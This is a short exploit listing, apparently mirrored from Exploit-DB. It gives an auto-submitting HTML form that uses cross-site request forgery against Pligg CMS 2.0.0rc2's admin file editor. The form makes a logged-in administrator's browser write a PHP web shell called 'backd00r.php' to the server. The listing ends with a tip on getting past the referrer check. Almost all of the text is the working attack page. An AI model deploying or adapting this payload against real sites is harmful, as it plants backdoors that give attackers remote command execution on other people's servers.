Pligg CMS 2.0.0rc2 – Cross-Site Request Forgery (File Creation)

  • 作者: DaOne
    日期: 2013-08-15
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/27600/
  • ---------------------------------------------------
    # Exploit Title: Pligg CMS - CSRF Vulnerability
    # Author: DaOne
    # Vendor Homepage: http://pligg.com/
    # Download link: https://github.com/Pligg/pligg-cms/archive/2.0.0rc2.zip
    # Category: webapps/php
    # Version: 2.0.0rc2 + old versions
    ---------------------------------------------------
    
    -Create File by CSRF Exploit-
    <html>
    <body onload="document.form.submit();">
    <form action="http://[target]/pligg/admin/admin_editor.php" method="post" name="form">
    <input type="hidden" name="updatedfile" value="<?php system($_REQUEST['cmd']); ?>">
    <input type="hidden" name="the_file2" value="/var/www/html/pligg/backd00r.php">
    <input type="hidden" name="isempty" value="1">
    <input type="hidden" name="save" value="Save+Changes">
    </form>
    </body>
    </html>
    
    # Exploit-DB Note:
    # If getting a Wrong Referrer error, use Live HTTP Headers or Tamper Date plugin
    # to mitigate the issue.